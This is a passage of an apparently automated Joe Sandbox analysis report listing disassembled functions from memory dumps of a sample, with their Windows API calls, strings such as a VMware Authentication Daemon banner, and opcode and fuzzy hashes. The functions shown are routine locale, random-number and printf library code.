                                                    • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                    • String ID:
                                                    • API String ID: 1045392073-0
                                                    • Opcode ID: 5fe6468efe2f4134cf5b645979f4b99768e2b1f23e48cdd179119280de51ef2d
                                                    • Instruction ID: ed58fef8c6f86c507cd4a3125876a0dbfed3a08aee45e750dea826403c3bdf94
                                                    • Opcode Fuzzy Hash: 5fe6468efe2f4134cf5b645979f4b99768e2b1f23e48cdd179119280de51ef2d
                                                    • Instruction Fuzzy Hash: B23107B5D022189FDB20DFA5DD897CCBBF8EF08304F1041AAE40DAB250EB705A898F05
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF96F11 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLocaleInfoW.KERNEL32(00000000,2000000B,6CF9722F,00000002,00000000,?,?,?,6CF9722F,?,00000000), ref: 6CF96FAA
                                                    • GetLocaleInfoW.KERNEL32(00000000,20001004,6CF9722F,00000002,00000000,?,?,?,6CF9722F,?,00000000), ref: 6CF96FD3
                                                    • GetACP.KERNEL32(?,?,6CF9722F,?,00000000), ref: 6CF96FE8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID: ACP$OCP
                                                    • API String ID: 2299586839-711371036
                                                    • Opcode ID: 00f743f65e8d8c110ad14dc476212d242c734eb88456b16b69579d4827d468b1
                                                    • Instruction ID: be19982b62cfd82484cfd8f076ae7142c2109fc5b326ad71bd3114818d8b0d43
                                                    • Opcode Fuzzy Hash: 00f743f65e8d8c110ad14dc476212d242c734eb88456b16b69579d4827d468b1
                                                    • Instruction Fuzzy Hash: 5721AF32B25104AAFFA5CF15D901B8776B6EB85B5CB568524F90BDB904F732D940C3D0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED2450 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _printf.MSPDB140-MSVCRT ref: 00ED2468
                                                      • Part of subcall function 00ED26C0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,?,00ED2829,00EDA850,?,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED26C9
                                                      • Part of subcall function 00ED26C0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00EDA850,00000000,?,?,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED26E4
                                                    Strings
                                                    • VMware, xrefs: 00ED245E
                                                    • %s Authentication Daemon Version %u.%u for %s %s, xrefs: 00ED2463
                                                    • VMware Workstation, xrefs: 00ED2455
                                                    • 17.0.0 build-20800274, xrefs: 00ED2450
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: __acrt_iob_func__stdio_common_vfprintf_printf
                                                    • String ID: %s Authentication Daemon Version %u.%u for %s %s$17.0.0 build-20800274$VMware$VMware Workstation
                                                    • API String ID: 1378652321-2909783590
                                                    • Opcode ID: 8dd96f4e3b848582fd03dcd510ca907dee1f200b6aff21a54696a957efa89f3a
                                                    • Instruction ID: 7739eaf2ae046c2e067d145c39770ecc21fa04987228ce6362ec55664501584a
                                                    • Opcode Fuzzy Hash: 8dd96f4e3b848582fd03dcd510ca907dee1f200b6aff21a54696a957efa89f3a
                                                    • Instruction Fuzzy Hash: 50B09269BC0304B1E82432000C47F091001D330F06ED930A73620383E271C2124320A7
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF61A70 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260encryptionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(69F2C272,7508FC30,?), ref: 6CF61AB8
                                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6CF61DF0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ContextCryptErrorLastRelease
                                                    • String ID: operation failed with error $OS_Rng:
                                                    • API String ID: 3299239745-700108173
                                                    • Opcode ID: 3867f806fc2943aff870863df1631c775f4e936cf109ad482bc070358d35c904
                                                    • Instruction ID: cdb536c57c773734799bcfba2d98f09efac536a8c9e27ce49f8d4527d97920b8
                                                    • Opcode Fuzzy Hash: 3867f806fc2943aff870863df1631c775f4e936cf109ad482bc070358d35c904
                                                    • Instruction Fuzzy Hash: 78A1E271D102589FEB18CF68CC80BEEBB71FF46314F208299E455A7B91DB70AA85CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF61F30 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 152encryptionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CryptGenRandom.ADVAPI32(6CF54435,00000000,00000001), ref: 6CF61FC8
                                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6CF61FEB
                                                      • Part of subcall function 6CF77E22: EnterCriticalSection.KERNEL32(6CFDB368,?,00000000,?,6CF6203E,6CFD9F48,00000001), ref: 6CF77E2D
                                                      • Part of subcall function 6CF77E22: LeaveCriticalSection.KERNEL32(6CFDB368,?,6CF6203E,6CFD9F48,00000001), ref: 6CF77E6A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: CriticalCryptSection$ContextEnterLeaveRandomRelease
                                                    • String ID: CryptGenRandom
                                                    • API String ID: 1877079010-3616286655
                                                    • Opcode ID: b482137470a363eafa2fbe226b81eda5f47c19d819bc4e5cd1aa98216da7b9c7
                                                    • Instruction ID: a6b6b109c384b9bf524a73bd52ad7a3d5176665ccd677671c5374a1c732b5ac0
                                                    • Opcode Fuzzy Hash: b482137470a363eafa2fbe226b81eda5f47c19d819bc4e5cd1aa98216da7b9c7
                                                    • Instruction Fuzzy Hash: 44510271900244EFCB10DFA9C844FDEB7B4FB05358F1645AEE901ABB81CB31AA18CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF96B98 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 6CF8B05D: GetLastError.KERNEL32(?,?,?,6CF8D632,?,00000001,6CF83A72,?,6CF8DAEC,00000001,?,?,?,6CF839A1,?,00000000), ref: 6CF8B062
                                                      • Part of subcall function 6CF8B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6CF8DAEC,00000001,?,?,?,6CF839A1,?,00000000,00000000,6CFB6E90,0000002C,6CF83A72), ref: 6CF8B100
                                                      • Part of subcall function 6CF8B05D: _free.LIBCMT ref: 6CF8B0BF
                                                      • Part of subcall function 6CF8B05D: _free.LIBCMT ref: 6CF8B0F5
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6CF96BEC
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6CF96C36
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6CF96CFC
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: InfoLocale$ErrorLast_free
                                                    • String ID:
                                                    • API String ID: 3140898709-0
                                                    • Opcode ID: b12889f0d22d114800189363a6c0b490b7589a4a3c866af46812eae000972212
                                                    • Instruction ID: 1469b5039295ec4ab1bebc4ce295adad436f53be95bccc35c4babe54997e80b0
                                                    • Opcode Fuzzy Hash: b12889f0d22d114800189363a6c0b490b7589a4a3c866af46812eae000972212
                                                    • Instruction Fuzzy Hash: 0761D5715052079FFF989F29CC82BAA73B8EF05308F10416AFD25C6A94E738D949CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF61E40 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67encryptionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CryptGenRandom.ADVAPI32(?,?), ref: 6CF61E92
                                                      • Part of subcall function 6CF61A70: GetLastError.KERNEL32(69F2C272,7508FC30,?), ref: 6CF61AB8
                                                      • Part of subcall function 6CF78F50: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00000000,?,?,6CF766CB,?,6CFB6AC8,00000000,?,00000000,?,?,?), ref: 6CF78FB0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: CryptErrorExceptionLastRaiseRandom
                                                    • String ID: CryptGenRandom
                                                    • API String ID: 1262793447-3616286655
                                                    • Opcode ID: d9ff1db9ef2439fa7ca2a83f15a25a7a1d3fbce3690db065329717a2cb7eb419
                                                    • Instruction ID: a98dbadffebd63ea9ae490d67b4b04c0d930616da3c33084eb60f0f192333e49
                                                    • Opcode Fuzzy Hash: d9ff1db9ef2439fa7ca2a83f15a25a7a1d3fbce3690db065329717a2cb7eb419
                                                    • Instruction Fuzzy Hash: 2F219272910148DBCB64DFA4C940FDDB7B4EB15324F004A6AE812A7F80DF31BA04CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED8D9F Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00ED8DB5
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: FeaturePresentProcessor
                                                    • String ID:
                                                    • API String ID: 2325560087-0
                                                    • Opcode ID: 9973f7bbd972a52e093888b0ab36e6856c1fc270e0bf55606f02c0ec28c50696
                                                    • Instruction ID: 7a2e061bd32a7d2e7a01cd7146c393ef67a1c4887e26da56dc293c94f9d8167e
                                                    • Opcode Fuzzy Hash: 9973f7bbd972a52e093888b0ab36e6856c1fc270e0bf55606f02c0ec28c50696
                                                    • Instruction Fuzzy Hash: F2518AB1A002498FEB25CF55DA823AEBBF4FB48344F1485AAE805FB391D7749985CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF93AFA Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1be179ba123ca00479ccadcf6fb4151dec0662e1d9959e6dcee5da0981ea3675
                                                    • Instruction ID: 9b266f125eeb38a7a14734707a8f379cb0666ea639e961daaa8810a8ecf3797f
                                                    • Opcode Fuzzy Hash: 1be179ba123ca00479ccadcf6fb4151dec0662e1d9959e6dcee5da0981ea3675
                                                    • Instruction Fuzzy Hash: E041AFB5C0521CAEEF14DF69CC88AEABBB8EF45308F1442D9E41DD3210DA359E888F50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF96DEB Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 6CF8B05D: GetLastError.KERNEL32(?,?,?,6CF8D632,?,00000001,6CF83A72,?,6CF8DAEC,00000001,?,?,?,6CF839A1,?,00000000), ref: 6CF8B062
                                                      • Part of subcall function 6CF8B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6CF8DAEC,00000001,?,?,?,6CF839A1,?,00000000,00000000,6CFB6E90,0000002C,6CF83A72), ref: 6CF8B100
                                                      • Part of subcall function 6CF8B05D: _free.LIBCMT ref: 6CF8B0BF
                                                      • Part of subcall function 6CF8B05D: _free.LIBCMT ref: 6CF8B0F5
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6CF96E3F
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast_free$InfoLocale
                                                    • String ID:
                                                    • API String ID: 2003897158-0
                                                    • Opcode ID: 781db6c92213bdac5731450b31c8f5356736dec08de837cd048855379b337c78
                                                    • Instruction ID: b8a23c372e5d419f34538a534caddf6c314c4ed3a7034478b04976681f314a1e
                                                    • Opcode Fuzzy Hash: 781db6c92213bdac5731450b31c8f5356736dec08de837cd048855379b337c78
                                                    • Instruction Fuzzy Hash: 6121A472A15206ABFF98AF25CC41EEB73B8EF45318F10017AFD15D6A40EB35E9448798
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF96A72 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 6CF8B05D: GetLastError.KERNEL32(?,?,?,6CF8D632,?,00000001,6CF83A72,?,6CF8DAEC,00000001,?,?,?,6CF839A1,?,00000000), ref: 6CF8B062
                                                      • Part of subcall function 6CF8B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6CF8DAEC,00000001,?,?,?,6CF839A1,?,00000000,00000000,6CFB6E90,0000002C,6CF83A72), ref: 6CF8B100
                                                    • EnumSystemLocalesW.KERNEL32(6CF96B98,00000001,00000000,?,-00000050,?,6CF971C6,00000000,?,?,?,00000055,?), ref: 6CF96AE4
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                    • String ID:
                                                    • API String ID: 2417226690-0
                                                    • Opcode ID: d196455448aca576246347cb866087105d31c5cdfd860005fd808f71e71fb558
                                                    • Instruction ID: 8f03e0e586f0865b2db82c9ab6f99e01fb1a64edff11e15128d8febd86f76c48
                                                    • Opcode Fuzzy Hash: d196455448aca576246347cb866087105d31c5cdfd860005fd808f71e71fb558
                                                    • Instruction Fuzzy Hash: BD1129366043055FEF089F39C8905AABBA1FF8131CB18892DE54787F00E3327542CB80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF96980 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 6CF8B05D: GetLastError.KERNEL32(?,?,?,6CF8D632,?,00000001,6CF83A72,?,6CF8DAEC,00000001,?,?,?,6CF839A1,?,00000000), ref: 6CF8B062
                                                      • Part of subcall function 6CF8B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6CF8DAEC,00000001,?,?,?,6CF839A1,?,00000000,00000000,6CFB6E90,0000002C,6CF83A72), ref: 6CF8B100
                                                      • Part of subcall function 6CF8B05D: _free.LIBCMT ref: 6CF8B0BF
                                                      • Part of subcall function 6CF8B05D: _free.LIBCMT ref: 6CF8B0F5
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6CF969D4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast_free$InfoLocale
                                                    • String ID: utf8
                                                    • API String ID: 2003897158-905460609
                                                    • Opcode ID: 8ee1355a6eb645df94dd68c82402b85868d60325a54b82d6835f94fe6f7c076c
                                                    • Instruction ID: cbe7efa0c3dd0ea281712245b567bd7cf64f6cebb8b041f9e06cd0192315fe24
                                                    • Opcode Fuzzy Hash: 8ee1355a6eb645df94dd68c82402b85868d60325a54b82d6835f94fe6f7c076c
                                                    • Instruction Fuzzy Hash: B0F02832B15105ABDB249B34CD45EFA33BCDB45314F01027AF502E7680EB74AD088794
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF96B0D Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 6CF8B05D: GetLastError.KERNEL32(?,?,?,6CF8D632,?,00000001,6CF83A72,?,6CF8DAEC,00000001,?,?,?,6CF839A1,?,00000000), ref: 6CF8B062
                                                      • Part of subcall function 6CF8B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6CF8DAEC,00000001,?,?,?,6CF839A1,?,00000000,00000000,6CFB6E90,0000002C,6CF83A72), ref: 6CF8B100
                                                    • EnumSystemLocalesW.KERNEL32(6CF96DEB,00000001,?,?,-00000050,?,6CF9718A,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 6CF96B57
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                    • String ID:
                                                    • API String ID: 2417226690-0
                                                    • Opcode ID: 966c2e47a70e37bde68916b2ecf201c347f0596e044617fa348590bae9192af5
                                                    • Instruction ID: fef984e84e1601a176d37009dfb472b61cbe42327474624f7829c7e549c4ea53
                                                    • Opcode Fuzzy Hash: 966c2e47a70e37bde68916b2ecf201c347f0596e044617fa348590bae9192af5
                                                    • Instruction Fuzzy Hash: 1DF0C2366043045FEB145F35CC80A6A7BA1EB8276CF15452DF9468BA90D672A842C694
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF8EF3A Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
